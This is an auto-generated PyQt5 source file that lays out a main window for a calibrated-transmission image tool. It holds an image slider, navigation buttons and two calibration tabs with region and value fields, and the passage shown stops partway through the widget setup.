| |
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file '/Users/j35/git/python_notebooks/notebooks/ui/ui_calibrated_transmission.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(1347, 949)
MainWindow.setMinimumSize(QtCore.QSize(0, 300))
MainWindow.setLayoutDirection(QtCore.Qt.LeftToRight)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.verticalLayout_7 = QtWidgets.QVBoxLayout(self.centralwidget)
self.verticalLayout_7.setObjectName("verticalLayout_7")
self.tabWidget = QtWidgets.QTabWidget(self.centralwidget)
self.tabWidget.setObjectName("tabWidget")
self.tab = QtWidgets.QWidget()
self.tab.setObjectName("tab")
self.verticalLayout_4 = QtWidgets.QVBoxLayout(self.tab)
self.verticalLayout_4.setObjectName("verticalLayout_4")
self.splitter_2 = QtWidgets.QSplitter(self.tab)
self.splitter_2.setOrientation(QtCore.Qt.Vertical)
self.splitter_2.setObjectName("splitter_2")
self.splitter = QtWidgets.QSplitter(self.splitter_2)
self.splitter.setOrientation(QtCore.Qt.Horizontal)
self.splitter.setObjectName("splitter")
self.layoutWidget = QtWidgets.QWidget(self.splitter)
self.layoutWidget.setObjectName("layoutWidget")
self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.layoutWidget)
self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
self.verticalLayout_2.setObjectName("verticalLayout_2")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.pyqtgraph_widget = QtWidgets.QWidget(self.layoutWidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.pyqtgraph_widget.sizePolicy().hasHeightForWidth())
self.pyqtgraph_widget.setSizePolicy(sizePolicy)
self.pyqtgraph_widget.setObjectName("pyqtgraph_widget")
self.horizontalLayout_2.addWidget(self.pyqtgraph_widget)
self.verticalLayout_2.addLayout(self.horizontalLayout_2)
self.horizontalLayout_3 = QtWidgets.QHBoxLayout()
self.horizontalLayout_3.setObjectName("horizontalLayout_3")
self.previous_image_button = QtWidgets.QPushButton(self.layoutWidget)
self.previous_image_button.setEnabled(False)
self.previous_image_button.setObjectName("previous_image_button")
self.horizontalLayout_3.addWidget(self.previous_image_button)
self.file_slider = QtWidgets.QSlider(self.layoutWidget)
self.file_slider.setLayoutDirection(QtCore.Qt.LeftToRight)
self.file_slider.setOrientation(QtCore.Qt.Horizontal)
self.file_slider.setTickPosition(QtWidgets.QSlider.TicksAbove)
self.file_slider.setObjectName("file_slider")
self.horizontalLayout_3.addWidget(self.file_slider)
self.image_slider_value = QtWidgets.QLabel(self.layoutWidget)
self.image_slider_value.setMinimumSize(QtCore.QSize(30, 0))
self.image_slider_value.setMaximumSize(QtCore.QSize(30, 16777215))
self.image_slider_value.setBaseSize(QtCore.QSize(50, 0))
self.image_slider_value.setObjectName("image_slider_value")
self.horizontalLayout_3.addWidget(self.image_slider_value)
self.next_image_button = QtWidgets.QPushButton(self.layoutWidget)
self.next_image_button.setObjectName("next_image_button")
self.horizontalLayout_3.addWidget(self.next_image_button)
self.verticalLayout_2.addLayout(self.horizontalLayout_3)
self.toolBox = QtWidgets.QToolBox(self.splitter)
self.toolBox.setObjectName("toolBox")
self.page = QtWidgets.QWidget()
self.page.setGeometry(QtCore.QRect(0, 0, 590, 646))
self.page.setObjectName("page")
self.verticalLayout_11 = QtWidgets.QVBoxLayout(self.page)
self.verticalLayout_11.setObjectName("verticalLayout_11")
self.tabWidget_2 = QtWidgets.QTabWidget(self.page)
self.tabWidget_2.setObjectName("tabWidget_2")
self.tab_3 = QtWidgets.QWidget()
self.tab_3.setObjectName("tab_3")
self.verticalLayout_5 = QtWidgets.QVBoxLayout(self.tab_3)
self.verticalLayout_5.setObjectName("verticalLayout_5")
self.horizontalLayout_12 = QtWidgets.QHBoxLayout()
self.horizontalLayout_12.setObjectName("horizontalLayout_12")
self.use_calibration1_checkbox = QtWidgets.QCheckBox(self.tab_3)
self.use_calibration1_checkbox.setChecked(True)
self.use_calibration1_checkbox.setObjectName("use_calibration1_checkbox")
self.horizontalLayout_12.addWidget(self.use_calibration1_checkbox)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_12.addItem(spacerItem)
self.verticalLayout_5.addLayout(self.horizontalLayout_12)
self.gridLayout = QtWidgets.QGridLayout()
self.gridLayout.setObjectName("gridLayout")
self.calibration1_x0_label = QtWidgets.QLabel(self.tab_3)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(26, 30, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(26, 30, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_x0_label.setPalette(palette)
self.calibration1_x0_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration1_x0_label.setObjectName("calibration1_x0_label")
self.gridLayout.addWidget(self.calibration1_x0_label, 0, 0, 1, 1)
self.calibration1_x0 = QtWidgets.QLineEdit(self.tab_3)
self.calibration1_x0.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration1_x0.setBaseSize(QtCore.QSize(0, 0))
self.calibration1_x0.setObjectName("calibration1_x0")
self.gridLayout.addWidget(self.calibration1_x0, 0, 1, 1, 1)
self.calibration1_width_label = QtWidgets.QLabel(self.tab_3)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_width_label.setPalette(palette)
self.calibration1_width_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration1_width_label.setObjectName("calibration1_width_label")
self.gridLayout.addWidget(self.calibration1_width_label, 0, 2, 1, 1)
self.calibration1_width = QtWidgets.QLineEdit(self.tab_3)
self.calibration1_width.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration1_width.setObjectName("calibration1_width")
self.gridLayout.addWidget(self.calibration1_width, 0, 3, 1, 1)
self.calibration1_value_label = QtWidgets.QLabel(self.tab_3)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_value_label.setPalette(palette)
self.calibration1_value_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration1_value_label.setObjectName("calibration1_value_label")
self.gridLayout.addWidget(self.calibration1_value_label, 0, 4, 1, 1)
self.calibration1_value = QtWidgets.QLineEdit(self.tab_3)
self.calibration1_value.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration1_value.setObjectName("calibration1_value")
self.gridLayout.addWidget(self.calibration1_value, 0, 5, 1, 1)
self.calibration1_y0_label = QtWidgets.QLabel(self.tab_3)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_y0_label.setPalette(palette)
self.calibration1_y0_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration1_y0_label.setObjectName("calibration1_y0_label")
self.gridLayout.addWidget(self.calibration1_y0_label, 1, 0, 1, 1)
self.calibration1_y0 = QtWidgets.QLineEdit(self.tab_3)
self.calibration1_y0.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration1_y0.setObjectName("calibration1_y0")
self.gridLayout.addWidget(self.calibration1_y0, 1, 1, 1, 1)
self.calibration1_height_label = QtWidgets.QLabel(self.tab_3)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_height_label.setPalette(palette)
self.calibration1_height_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration1_height_label.setObjectName("calibration1_height_label")
self.gridLayout.addWidget(self.calibration1_height_label, 1, 2, 1, 1)
self.calibration1_height = QtWidgets.QLineEdit(self.tab_3)
self.calibration1_height.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration1_height.setObjectName("calibration1_height")
self.gridLayout.addWidget(self.calibration1_height, 1, 3, 1, 1)
self.verticalLayout_5.addLayout(self.gridLayout)
self.calibration1_groupbox = QtWidgets.QGroupBox(self.tab_3)
self.calibration1_groupbox.setObjectName("calibration1_groupbox")
self.verticalLayout = QtWidgets.QVBoxLayout(self.calibration1_groupbox)
self.verticalLayout.setObjectName("verticalLayout")
self.horizontalLayout_4 = QtWidgets.QHBoxLayout()
self.horizontalLayout_4.setObjectName("horizontalLayout_4")
self.label_38 = QtWidgets.QLabel(self.calibration1_groupbox)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.label_38.setPalette(palette)
self.label_38.setObjectName("label_38")
self.horizontalLayout_4.addWidget(self.label_38)
self.calibration1_index = QtWidgets.QLabel(self.calibration1_groupbox)
self.calibration1_index.setMinimumSize(QtCore.QSize(50, 0))
self.calibration1_index.setMaximumSize(QtCore.QSize(20, 1666))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_index.setPalette(palette)
self.calibration1_index.setObjectName("calibration1_index")
self.horizontalLayout_4.addWidget(self.calibration1_index)
self.calibration1_display_this_file_button = QtWidgets.QPushButton(self.calibration1_groupbox)
self.calibration1_display_this_file_button.setMinimumSize(QtCore.QSize(0, 40))
self.calibration1_display_this_file_button.setMaximumSize(QtCore.QSize(16777215, 40))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(26, 30, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(26, 30, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_display_this_file_button.setPalette(palette)
self.calibration1_display_this_file_button.setObjectName("calibration1_display_this_file_button")
self.horizontalLayout_4.addWidget(self.calibration1_display_this_file_button)
self.verticalLayout.addLayout(self.horizontalLayout_4)
self.label_2 = QtWidgets.QLabel(self.calibration1_groupbox)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.label_2.setPalette(palette)
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.label_2.setFont(font)
self.label_2.setStatusTip("")
self.label_2.setAlignment(QtCore.Qt.AlignCenter)
self.label_2.setObjectName("label_2")
self.verticalLayout.addWidget(self.label_2)
self.calibration1_use_current_file_button = QtWidgets.QPushButton(self.calibration1_groupbox)
self.calibration1_use_current_file_button.setMinimumSize(QtCore.QSize(0, 40))
self.calibration1_use_current_file_button.setMaximumSize(QtCore.QSize(16777215, 40))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(26, 30, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(26, 30, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(24, 27, 230))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(69, 69, 69))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration1_use_current_file_button.setPalette(palette)
self.calibration1_use_current_file_button.setObjectName("calibration1_use_current_file_button")
self.verticalLayout.addWidget(self.calibration1_use_current_file_button)
spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem1)
self.verticalLayout_5.addWidget(self.calibration1_groupbox)
self.tabWidget_2.addTab(self.tab_3, "")
self.tab_4 = QtWidgets.QWidget()
self.tab_4.setObjectName("tab_4")
self.verticalLayout_6 = QtWidgets.QVBoxLayout(self.tab_4)
self.verticalLayout_6.setObjectName("verticalLayout_6")
self.horizontalLayout_13 = QtWidgets.QHBoxLayout()
self.horizontalLayout_13.setObjectName("horizontalLayout_13")
self.use_calibration2_checkbox = QtWidgets.QCheckBox(self.tab_4)
self.use_calibration2_checkbox.setChecked(True)
self.use_calibration2_checkbox.setObjectName("use_calibration2_checkbox")
self.horizontalLayout_13.addWidget(self.use_calibration2_checkbox)
spacerItem2 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_13.addItem(spacerItem2)
self.verticalLayout_6.addLayout(self.horizontalLayout_13)
self.gridLayout_2 = QtWidgets.QGridLayout()
self.gridLayout_2.setObjectName("gridLayout_2")
self.calibration2_x0_label = QtWidgets.QLabel(self.tab_4)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration2_x0_label.setPalette(palette)
self.calibration2_x0_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration2_x0_label.setObjectName("calibration2_x0_label")
self.gridLayout_2.addWidget(self.calibration2_x0_label, 0, 0, 1, 1)
self.calibration2_x0 = QtWidgets.QLineEdit(self.tab_4)
self.calibration2_x0.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration2_x0.setBaseSize(QtCore.QSize(0, 0))
self.calibration2_x0.setObjectName("calibration2_x0")
self.gridLayout_2.addWidget(self.calibration2_x0, 0, 1, 1, 1)
self.calibration2_width_label = QtWidgets.QLabel(self.tab_4)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration2_width_label.setPalette(palette)
self.calibration2_width_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration2_width_label.setObjectName("calibration2_width_label")
self.gridLayout_2.addWidget(self.calibration2_width_label, 0, 2, 1, 1)
self.calibration2_width = QtWidgets.QLineEdit(self.tab_4)
self.calibration2_width.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration2_width.setObjectName("calibration2_width")
self.gridLayout_2.addWidget(self.calibration2_width, 0, 3, 1, 1)
self.calibration2_value_label = QtWidgets.QLabel(self.tab_4)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration2_value_label.setPalette(palette)
self.calibration2_value_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration2_value_label.setObjectName("calibration2_value_label")
self.gridLayout_2.addWidget(self.calibration2_value_label, 0, 4, 1, 1)
self.calibration2_value = QtWidgets.QLineEdit(self.tab_4)
self.calibration2_value.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration2_value.setObjectName("calibration2_value")
self.gridLayout_2.addWidget(self.calibration2_value, 0, 5, 1, 1)
self.calibration2_y0_label = QtWidgets.QLabel(self.tab_4)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration2_y0_label.setPalette(palette)
self.calibration2_y0_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration2_y0_label.setObjectName("calibration2_y0_label")
self.gridLayout_2.addWidget(self.calibration2_y0_label, 1, 0, 1, 1)
self.calibration2_y0 = QtWidgets.QLineEdit(self.tab_4)
self.calibration2_y0.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration2_y0.setObjectName("calibration2_y0")
self.gridLayout_2.addWidget(self.calibration2_y0, 1, 1, 1, 1)
self.calibration2_height_label = QtWidgets.QLabel(self.tab_4)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(193, 22, 45))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(106, 104, 100))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
self.calibration2_height_label.setPalette(palette)
self.calibration2_height_label.setAlignment(QtCore.Qt.AlignRight|QtCore.Qt.AlignTrailing|QtCore.Qt.AlignVCenter)
self.calibration2_height_label.setObjectName("calibration2_height_label")
self.gridLayout_2.addWidget(self.calibration2_height_label, 1, 2, 1, 1)
self.calibration2_height = QtWidgets.QLineEdit(self.tab_4)
self.calibration2_height.setMaximumSize(QtCore.QSize(50, 16777215))
self.calibration2_height.setObjectName("calibration2_height")
self.gridLayout_2.addWidget(self.calibration2_height, 1, 3, 1, 1)
self.verticalLayout_6.addLayout(self.gridLayout_2)
self.calibration2_groupbox = QtWidgets.QGroupBox(self.tab_4)
self.calibration2_groupbox.setObjectName("calibration2_groupbox")
self.verticalLayout_9 = QtWidgets.QVBoxLayout(self.calibration2_groupbox)
self.verticalLayout_9.setObjectName("verticalLayout_9")
